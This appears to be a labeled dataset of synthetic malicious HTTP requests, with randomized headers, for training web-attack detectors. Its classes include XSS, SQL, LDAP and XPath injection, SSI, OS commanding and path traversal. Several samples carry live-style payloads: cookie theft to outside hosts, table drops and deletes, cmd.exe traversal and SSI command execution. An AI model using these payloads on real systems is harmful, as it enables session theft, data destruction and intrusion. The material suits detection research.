null

End - Id: 47974
Start - Id: 47036
class: XSS
GET /nQTf/a9ziqiabonzho/9ZRYAqtZF./ni77isdedsa/cTYujo/Bo-8Dv3RC3include/8yeatnkakcwzu.dll?wc1esEEmSu=0633246&ttO=%26%7B%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.genatr.com%2Fcgi-bin%2Fanic.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&pEstnsaaAs6obv=91253&ole=9i&ojwiflnnV=057925&Y.SRWjIC=ez%27+gjrposition+&tiUra=976 HTTP/1.1
Host: www.iaga3nflby.cz:80
Connection: aact
Accept: */*;q=0.2
Accept-Charset: x-mac-hebrew;q=0.3, cp-932;q=0.2, windows-1250;q=0.0, x-mac-arabic;q=0.1, ks_c_5601-1987;q=0.2
Accept-Encoding: *
Accept-Language: afn-Er, weale-snc
Cache-Control: max-age=07123
Client-ip: 71.223.100.67
Cookie: sijetNO6bt=riN;rTtaEi=Trioh;YgNnUuS=a>mJt23;ol0sStedtttm4n=pbnftpcOrbb
Cookie2: $Version="34"
Date: Mon, 19 Apr 04 22:00:21 GMT
ETag: W/"Wv1N7CAcXp.A1d0q"
Expect: tbosO4uw=ourpoii
From: ariNbe@hsyoEoop.ch
If-Modified-Since: Wed, 04 Aug 04 18:38:53 UTC
If-Unmodified-Since: Tue, 06 Mar 07 23:19:30 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: *
If-Range: *
Max-Forwards: 8021
MIME-Version: 5.6
Pragma: df='h'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: nmlamp iens2=lgLer1ea
Range: 127-39590,86298-2
Referer: http://razd5Ts.biz/i4oEreh/iuemiyeb/grrIUD/incea2/8eeiy.php4
TE: trailers,gzip;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.5 (X11; U; Open BSD i386 6.4; sd-1a; rv:4.6.1) Gecko/38920048
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: 7.0 www.splcv.gif, HTTP/9.8 www.iatnl4F.htm, 1.7 130.62.25.28:86
Transfer-Encoding: n6ea
Upgrade: NHE/1.8, ae6/6.9, adres/1.0, asiq/7.0, wkbmX/2.6
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47036
Start - Id: 38884
class: LdapInjection
GET /8eiddeonrs2/tjt5t@6.TRPk/eF2rXAFERI8n@ilYfPx2/xSTqU/iw7AG@BJl2P.gif?R5shutdownOcpuR0evaldY=%29+++%28++%7C++%28displayName%3Dhad*%29+++%28name++++%3D+++had*++++%29%28mail%3Dhad*+++%29&yh00breaeua3O=6hritsa&dE2nFnodeTZ_J=4hc64e HTTP/1.1
Host: 126.45.56.48
Connection: keep-alive
Accept: application/zip, application/*;q=0.4, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: xaiely=r
Client-ip: 191.208.34.138
Cookie: Yeferunltms=5683260627;-dHajFk9a=seerhtpassr8OOic1a o;emhwfosa4tSs=o-i;hlUn4=1987912;_Weid0zvKN=goSo|nb1oee;aetyt0efh9os=zcA
Cookie2: $Version="1"
Date: Fri, 23 Jul 04 15:55:01 UTC
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sat, 05 May 07 11:25:13 CET
If-Unmodified-Since: Sat, 30 Oct 04 20:09:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8268
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM MnQzaW9iYWF0aHNsUnRjYzBudGlpa0FvVWVjZWE3ZWlwNGVsaHNpYWZpc3BoZWE=
Authorization: Digest nonce
Range: 15934-,799-8058,-81465
Referer: http://www.rtxiqo.ch/acNeesl/o4I9cip.pl
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: earttHOyl8ieeta
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 5.4 www.afeah.tiff:05, FTP/8.6 www.enHl6cv.gif:90782
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: p9rld/0.9, tneW2/8.4
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38884
Start - Id: 35023
class: SqlInjection
GET /cShcktp/WGRj_l3T4VCIAM/t3Ww_4V69aXiVXc6jx/iAdgqUz6mMT.gif?6D1c=%5BiOt%2FqSl&loh=5nkf&rooYbher9mNpne8=764148341&lL72ps=voteto%2FEtl9&12ztsEa2a=9015055&apscallceAbnI=dHo4z&8otb5Ni=aL1 HTTP/1.0
Host: www.1Bcrehl.de
Connection: keep-alive
Accept: image/gif;q=0.7, video/mpeg;q=0.2, video/mpeg
Accept-Language: bulk   insert  aearfip   from 'pwdump.exe'    with    (codepage='RAW'  )
Client-ip: 125.169.143.8
Date: Fri, 23 Apr 10 18:12:08 UTC
If-Unmodified-Since: Tue, 14 Oct 08 19:12:53 CET
Authorization: Digest opaque="beyen"
Range: 8612-,-16,911862-7625
Referer: http://www.5A0ba.biz/ice7ne7/uo2rlh.zip
TE: trailers,deflate
Trailer: Upgrade
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 6.1; or-Ob; rv:3.6.1) Gecko/27251021
Via: FTP/9.5 165.159.141.135:514, 6.2 219.57.195.36, FTP/0.7 170.223.228.212:4305
Transfer-Encoding: gzip

null

End - Id: 35023
Start - Id: 48731
class: XPathInjection
GET /c3VFjCVnnD_rVSu/i3j.shtml?cos6bfRer9ftgc=YzHhoechotxM%26usamtso&m2shceo=e1rtistneun&cs5wk0A=0tlhomeamt+pinb%27%3Eqn&db3=aohtIseontp&ajliT=+Je0E&lsf386=woMwO7CeW&sur3tndHe6crV=56195646&sis=z1rnurnU%27++++or+meto%2Fetiql%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D29%5D+++or++++%27osS3n%27++++%3D%27&tfSn0r1drnavlen=162 HTTP/1.1
Host: www.4splra.cz
Connection: lnie
Accept: */*
Accept-Charset: cp-936;q=0.5, euc-tw;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: otcq8-pnnz, labeyv-S, hsiRn-P;q=0.6, nOasencm-ddat
Cache-Control: e='L1n'
Client-ip: 219.77.148.199
Cookie: fromndocumentUnwindow.openY4xGO=173832;teloz=a6c;psloat1sscb=utp=1idli2;giuequrctrs=ce?or
Cookie2: $Version="582"
Date: Mon, 21 Jan 08 21:11:55 UTC
ETag: "BNYgiCLjg9lbGVfj_6"
Expect: thslw=abtirt;neba
From: wdlEt@aLnyEae.st
If-Modified-Since: Wed, 26 Dec 07 19:20:51 GMT
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "bDjXKY.nSPaQoaf_@7"
If-None-Match: "ouf46Y8B3iLeq3WU1"
If-Range: Tue, 25 Mar 08 18:47:01 CET
Max-Forwards: 72
MIME-Version: 1.5
Pragma: dPAmoSs=4eiitot
Proxy-Authorization: Digest uri=/otrw4ske.cfm
Authorization: NTLM amVWcWFiMnNwcTM5b25obkhwT3RxdGhhZXkxdEV0RXI0U21OU0VsazVldG1jMw==
Range: 328-,-79624
Referer: http://dorq.de/eaerhe.shtml
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.7 (compatible; otwon; Win98; txlnh3; sTerr)
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: FTP/6.8 70.1.144.81, HTTP/3.9 168.125.121.166
Transfer-Encoding: gzip
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 300 www.HoEr1Dn.gif "tteseoapsoeca" 
X-Forwarded-For: 56.221.27.196
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48731
Start - Id: 44039
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 151.159.13.111
Connection: keep-alive
Accept: application/*, audio/basic;q=0.4, application/*;q=0.9
Accept-Charset: x-mac-cyrillic, windows-1251;q=0.8, x-mac-icelandic, windows-874;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 199.92.23.73
Cookie: iLatApTcot=26621;a2eOorjns=ltelnet2o5;rideY9=otehOi;msdEioterai4onM=Rioos;xre5fhaieaamE=/e/j ata
Cookie2: $Version="4"
Date: Tue, 26 Oct 04 22:49:03 GMT
ETag: "cZaj62310s-79KCP"
Expect: ehwes=nuc4cz
From: fasutm@u0PGri.cz
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Sat, 11 Apr 09 15:14:41 UTC
If-Match: "PZ6__oUsmE0h6nd4D"
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Sun, 09 Aug 09 11:15:26 GMT
Max-Forwards: 5333
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic YWtFd25wOmtoYW8=
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: /Drca/ziir1o5a/flooL4o/0helh.wmn
TE: trailers,deflate
Trailer: Authorization
User-Agent: ziYuycD4 http://www.nA5rs.net
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 695x429
Via: FTP/1.1 133.226.155.4, 7.6 www.ueef.css:76
Transfer-Encoding: nraOo
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44039
Start - Id: 47209
class: XSS
GET /eqp3q.PXct@DrE7KQx6/Silogj9sgfld/R@W/efnW5tXMfWhPk_I/ua/SFbL2/a9psCKLhBuNQperlA@x/oemua66qqOmihe/dzZdFkfpmAYhT/3VTHCUnXo/naTkZ0-VpofW.Q6ckLWy/szLUs5oj2FFGW.js?ggooReorRc88ng=80214&tb=%3C%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F150.150.71.58%2Fns.dll%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E HTTP/1.1
Host: www.tufbe.net:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: dcoATvde-sl1n
Cache-Control: min-fresh=9
Client-ip: 63.161.16.102
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="8"
Date: Tue, 04 May 10 19:24:17 GMT
ETag: "owjdohDQxUXpeBzPAh5"
Expect: 100-continue
From: srhus@cga6s.uk
If-Modified-Since: Mon, 19 Jul 04 19:37:23 CET
If-Unmodified-Since: Sat, 26 Jan 08 08:25:07 GMT
If-Match: "zjam0N@.5UF1pCJ"
If-None-Match: "NPkGpvGSG.VtH@OYuzv"
If-Range: Fri, 09 Feb 07 19:02:57 GMT
Max-Forwards: 4253
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM c242dHJOdDVzYThpUmVtZ253THJzd2Rpb25oeWdoTm5ybQ==
Range: 8-,46-,-554862
Referer: /tf940tn/h93arf/tsncd9t.bin
TE: gzip;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/5.9 (Windows; U; Win98 8.8; in-r8; rv:3.8.9) Gecko/05804594
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: 2.6 www.4geu.htm, 1.3 214.63.9.22
Transfer-Encoding: compress
Upgrade: urd/1.0
Warning: 023 176.209.137.215 "wrgDroclerrobjmfp3o" "Thu, 19 Jun 08 19:41:05 GMT"
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47209
Start - Id: 45569
class: PathTransversal
GET /z-SsbD2kT/hR/eanoorhntt8U0hz068c/mSP8iMysvPkPe0H3i0k2/lYANHU-61s@Ro.@/n5l6/g91c8uipdLmcsC22QtR.css?esl=io&oV6cP.I=95478&hDocU=hSxQlPn0PPb&gh4iunctUenLnf=exec&badbdystmsm=275637&haodfeDaht=%29d&m5ahShhu=1159986570&wxthopa=e%3A%5Cautoexec.bat&hi3aRspyss=tNS_%40QTmmCn.&necuh7ttwywsnei=a%29i HTTP/1.0
Host: www.gxses.cz
Connection: lyraO
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: HsEfutrs=iet
Client-ip: 80.183.70.158
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="99"
Date: Wed, 18 Apr 07 18:26:38 UTC
ETag: W/"qe3rNmdfO3POj4QPG"
Expect: 7Sjsoaml
From: nnmuo@mspetgyxi.de
If-Modified-Since: Mon, 06 Aug 07 07:13:22 CET
If-Unmodified-Since: Sun, 29 Jan 06 07:02:16 GMT
If-Match: "X9aWOG2g7DkPiP2AKB_"
If-None-Match: *
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 9
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: b7an3 ismsIo=k0ei
Range: -2
Referer: http://Iobn.it/thoe.mdb
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/3.0 (X11; U; Open BSD i386 0.4; js-lh; rv:3.1.1) Gecko/55508468
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0697x647
Via: hPI/3.9 www.uem3eaht.html
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 86157391207979195
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45569
Start - Id: 35367
class: SqlInjection
GET /t-_KklZuzf/Dxtermhtpassim4iLFjgFTZ7/jls2c4H.id1kyu9/6G.jrE4x/1wXZ@IjKWEzlfshutdown7/7nreta7/e@Pe5af/UcFx6K/mvrdns8ty/uqJosRqK.php?yT.m3F7Hy=legcdd%27+++%29%3B++DELETE++FROM++users+++WHERE+++upper%28username%29+++++%3D+++++upper%28+%27admin&wFZ.union=LepassthruecWfzoexech%7Ca&VV8wLTt8AYei=iYanqerlriehahsdfe HTTP/1.1
Host: www.k8Te0t3tNu.be
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 170.78.145.207
Cookie2: $Version="1"
Date: Tue, 03 Jan 06 03:01:51 UTC
ETag: "hOfZpQKb4lvYuJI"
Expect: 06leorna
From: tevu@zin09xt.com
If-Unmodified-Since: Sat, 16 Apr 05 18:20:05 CET
If-Match: "DTCBdNQ4Rklg9yc"
If-None-Match: "0R7gPUfMKFwF2bC"
If-Range: *
Max-Forwards: 1541
MIME-Version: 9.1
Pragma: no-cache
Authorization: N9er ltrrow=80sdtd
Range: 187-
Referer: http://www.fthmH9So.uk/nyxooo.jsp
TE: trailers,chunked;q=0.1,trailers
Trailer: Pragma
User-Agent: weos3oiig (obT6PMX; e0NU_T; noE2ULcYX; 7DFmZZm; iGRCAU)
UA-Pixels: 1597x768
Via: 9.6 65.47.28.46, 4.2 www.seelb.jpg:13015, 4.8 5.25.104.226
Transfer-Encoding: compress
Warning: 105 www.e4siinia.jpeg "yeoeae8edtaeehqtNems" 
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35367
Start - Id: 39143
class: SSI
GET /ti3X8@yO7@p3Y9x9hs/RfJ/nRUDfufCf9cI@_i5/aertsa2/ruwEdI3YQ/fsGitru5elgzaUq/@zDoZYA/yrTaoiu.gif?iuuiorsystl=wp-eb%28&@eInull2d5divmochaU7X=a6cretoymDlhtbou&emoO=s%3B%5B&ytieT=50474529 HTTP/1.1
Host: 223.11.127.95
Connection: keep-alive
Accept: audio/x-wav;q=0.4, image/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, identity, deflate, gzip;q=0.0
Accept-Language: waAa4S-ys;q=0.9, sbntiwtN-Gehr8eo1;q=0.5, 8yira-6r;q=0.9, jhm-kebcEhGc;q=0.2
Cache-Control: max-age=0605
Client-ip: 85.73.181.35
Cookie: rsgoAiEheors=984152;zaaYilrbaovxE=axk_R9kH@9;4u=tp;earrRofrem=A;tmisKc52SeH=evovohIc;mz_sw=g eahlkoiincludee
Cookie2: $Version="503"
Date: Wed, 25 Jul 07 17:38:49 GMT
ETag: W/"3lm3ehkeXKSz7_2xl@"
Expect: 100-continue
From: dwtnbtl@re8os1r5d.org
If-Modified-Since: Thu, 22 May 08 01:33:31 CET
If-Unmodified-Since: Tue, 20 Jul 04 08:27:14 GMT
If-Match: "0J6ZkdeH207mNMO"
If-None-Match: *
If-Range: Mon, 19 Jun 06 14:10:15 CET
Max-Forwards: 0
Proxy-Authorization: Basic YU9tbm9yOm9uYWw=
Authorization: ueerha aiRlg9a=ceedhai
Range: -64430,60846-,724-19046
Referer: /Aedimtr/heeMtPpb/3trjim/Tent.zip
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: <!--    #exec   cgi="/cgi-bin/script?iauolttHtn" -->
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 855x947
Via: qtom/6.4 www.de8ft.tiff
Warning: 601 129.18.108.121 "hesrsMelefcoI" 
X-Forwarded-For: 112.205.75.183

null

End - Id: 39143
Start - Id: 37308
class: LdapInjection
GET /td0FmsGAoWw78/vr5/rl2bCoKbgM3.js? HTTP/1.0
Host: 247.89.114.181:937
Connection: keep-alive
Accept: text/plain;q=0.2, application/*;q=0.4, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: mThu-a;q=0.8
Cache-Control: no-cache
Client-ip: 181.208.243.92
Cookie: tbszcjInakr=866071;aeecxnIr3eosa=98299;Ssasac=f7vhocE7hA1o;uow=eHiU;G0l-w60vzM3=d?itl;os;aooktdthrapc8==Dps2eidw
Cookie2: $Version="68"
Date: Sun, 29 May 05 16:05:09 UTC
ETag: W/"ui4lzoibifGmtndekwR"
From: renaseu@zeie4ptso.uk
If-Modified-Since: Sun, 13 May 07 11:24:46 GMT
If-Unmodified-Since: Mon, 27 Apr 09 12:29:53 GMT
If-Match: "Gu6bC_-sMpHMipQP"
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 4.4
Pragma: nlatf=1ho
Authorization: Digest nc=db30Cb41
Range: 503-,832-,6986-99
Referer: /ltTsnoDh/tlnt/hnEzwav1/E7Ig/DmrAdzsz.dll
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.7 (X11; U; Open BSD i386 0.3; ex-qu; rv:3.1.1) Gecko/09698097
UA-CPU: Sparc
UA-Disp: 6088,0787,32
UA-Color: color16
Via: FTP/2.7 www.9endmh4k.tiff:60
Transfer-Encoding: deflate
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 988 www.Panx.gif "uhhf" "Wed, 07 Mar 07 21:03:39 UTC"
X-Forwarded-For: 97.235.140.149
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37308
Start - Id: 39629
class: SSI
GET /9R9n3x2Pb/SamupiqgnsavRhfle/-R6VpassthruHz3crhttprN7w/q7yzTjlFroxqV6o/h9DpDv6/85/cdscq/rndb/GAm1O/v1H8grf9NC.msf?eitAudnEm6=7380744&rilnaotih=1642942&Q17MGe=rM1GIqp2SYo8&Zy@2wgc-xTg=e&ti=likep&F-1sambxtermg=aqin&Raihsylu1kSEh=l&flinkhttp98QUfulocation=03769&_i2VqsGnZA=%3C%21--%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&LuhHsjJA=0057454&jah5et9htnpltt0=Eexec&mef0rTne2Mn=nBiU.vMsr&UATbodyAxqn4M.=0atdiv8vaieZ&gnnpftstit=nfihe HTTP/1.0
Host: 3.222.2.49
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1252
Accept-Encoding: 
Accept-Language: eei8-wxni9at;q=0.8, tbd-2seaonxe;q=0.9, n2-3ray
Cache-Control: max-stale=527
Client-ip: 79.170.36.207
Cookie: 6A@Is5gYVvari0=dx@WsS6VeE;0a4lZzGk=gaDo;OlSNobjectd=17320431;avl=oa<7;toata=ens a]jiscripthHporewiafdocument
Cookie2: $Version="232"
Date: Tue, 22 Apr 08 17:25:33 GMT
ETag: "@Py@vCbgWDBllPns"
Expect: 100-continue
From: nneTpp@ds2o4khd.org
If-Modified-Since: Wed, 24 Mar 04 21:53:15 CET
If-Unmodified-Since: Sun, 04 Apr 04 07:28:32 CET
If-Match: "_SLt8K4i53beQ2dK5"
If-None-Match: *
If-Range: "1tBDwK1AmirrXI9L"
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: /iratg/zclg.sh
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: oepur5eaNq (hAcLlu7; 5pOixw)
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1841x260
Via: FTP/4.6 22.244.227.174
Transfer-Encoding: identity
Upgrade: Eyls/5.9, r7a/3.5, emaet9/3.7, Got/3.4
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 48.154.117.69
X-Serial-Number: 963759141034519657
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39629
Start - Id: 46522
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: www.ePytkhzh.org:80
Connection: peedljs
Accept: application/*;q=0.6, audio/x-wav, audio/basic;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: o='neha'
Client-ip: 246.28.222.74
Cookie: Nfnudc6pmtg=e7Rm
Cookie2: $Version="92"
Date: Sun, 29 Jul 07 04:25:02 UTC
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Mon, 09 Feb 09 23:00:04 GMT
If-Unmodified-Since: Thu, 22 Sep 05 02:18:48 CET
If-Match: "wa6B8W4dHwr_V0Uo.1if"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: Mon, 20 Apr 09 22:49:04 UTC
Max-Forwards: 43
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: evg2o7 3usa9ee=Jqio83
Range: -97604
Referer: /emos/earj65n.nsf
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: Mozilla/4.3 (X11; U; Open BSD i386 3.5; er-of; rv:2.4.5) Gecko/16170043
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/2.6 www.nRlS.tiff
Transfer-Encoding: gzip
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46522
Start - Id: 42679
class: SqlInjection
GET /z9YJ/Lr8bsarziwwesararr/rr55kfC/e_9q7ocfY/wonaairhe4w5ooi9/eJomwFeq/cSBtuUKtrZ32H/cmdxterm9HY/eX49mislU@24VOd.gif?H4otiie9iF=%27%3B++++drop+++++table+admin&rbmetIpal0wr=tnr HTTP/1.0
Host: www.Bhptnrqh.be
Connection: g9aTl
Accept: text/*
Accept-Charset: iso-8859-8, x-mac-arabic;q=0.6, x-mac-cyrillic;q=0.3, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: seprngop-dl2j9xtj;q=0.6
Cache-Control: max-stale
Client-ip: 219.244.18.221
Cookie: ul7nt6oshgnoo=ax5wolt9stfsfeessS;7nausEldontoitw=enimeisumc7k1;tdsy2Qob0=936
Date: Fri, 28 May 04 18:36:40 UTC
ETag: "xm_kl@DG33VU5oJ"
Expect: 100-continue
From: keNoy@ouhsnitwek.de
If-Modified-Since: Sun, 18 Apr 10 09:38:13 UTC
If-Unmodified-Since: Sun, 17 Apr 05 03:23:00 GMT
If-Match: "eW-wzrCDIYGIzFORTWOn"
If-None-Match: *
If-Range: *
Max-Forwards: 758
Pragma: no-cache
Proxy-Authorization: lmeoss zqgl=nnriemfz
Authorization: Basic dnhuYTppZW9pbw==
Range: 498-
Referer: http://tgxe.uk/ryrpespt/alaObUeo/tEau/rmiaF.php
TE: chunked;q=0.2
User-Agent: Lh2loeddhbrrodu
UA-CPU: MIPS
UA-OS: WinNT
Transfer-Encoding: identity
Upgrade: bho/9.5, ea9r/3.6, 2N1j/2.7, hswa/1.9, jah/5.8
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42679
Start - Id: 40146
class: SSI
GET /oy999n0c3d/ue70w7a/01Rb9vlibDmV4_3Hs/uteinrheradiAT3/qwI7-cpE2fqOp5ycpU0H/ojbsX-FL5/8Bjh0/lzfStlnfnhenfhoC/nrndoocotvovsNnsamlo/oblJe/rtM.cgi?@FWABB0=534&Idrlj=ekfi&panersHpK=ehttp9g&da7epatndoittu=%3C%21++%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E&qUn_htpassZhtpass=Tunperles%2Ftobject%3B%27edhsam-tda&e0rseeOnv03te=5 HTTP/1.1
Host: www.ltaeo.uk
Connection: ca2isla1
Accept: text/*, audio/*, application/*
Accept-Charset: windows-874;q=0.9, windows-1254;q=0.1, x-mac-arabic;q=0.0, euc-tw
Accept-Encoding: compress;q=0.5, gzip, gzip;q=0.9, compress;q=0.4
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 40.73.55.49
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="9"
Date: Thu, 27 May 04 21:41:32 UTC
ETag: "ENvhzzPwgadFUCJ3"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Sun, 22 May 05 22:28:17 GMT
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: "XGhS13FKOUyw5djyluNa"
If-Range: Tue, 06 May 08 11:08:00 UTC
Max-Forwards: 6356
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic SWJlbHQ1dGw6M25Tbm50ZQ==
Authorization: Digest qop=auth
Range: 543-5,-37763,-41932
Referer: /iseo.css
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.1 (Windows; U; WinNT 1.2; iN-b0; rv:9.8.9) Gecko/23587142
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5714x2082
Via: 4.3 www.Nheei.png:5, raiYo/8.5 16.226.82.172, HTTP/0.2 236.65.96.156
Transfer-Encoding: deflate
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 567 250.136.1.216:51630 "tiectbulaky" "Fri, 20 Jul 07 07:00:48 CET"
X-Forwarded-For: 197.14.49.35
X-Serial-Number: 7694674190970
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40146
Start - Id: 49382
class: XPathInjection
GET /dlVuEl6yaWIs.Zbu/fraankctlds/eheaeynnr/timscD4nis/CiCn0dR/nthf.shtml?nylcirtwE=henn&9nd0efeulXnE4uf=3048683&athtuni=fNstooetbs4lceans4&iiihteo7ldzo=75&mninctgoeAaht=ezlthk&thoidA8=+%25&ngrwinrtsj=hw&r7puirl6pe=n+HV&otnrl=nnabodSt%27++++or+count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28i++++%2B+++j+%2B++++k+++%2B++++l++++%2B+++1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+%27tmeuSei%27+%3D+%27+++soi9sat%27++or HTTP/1.1
Host: www.d5urdf.it
Connection: close
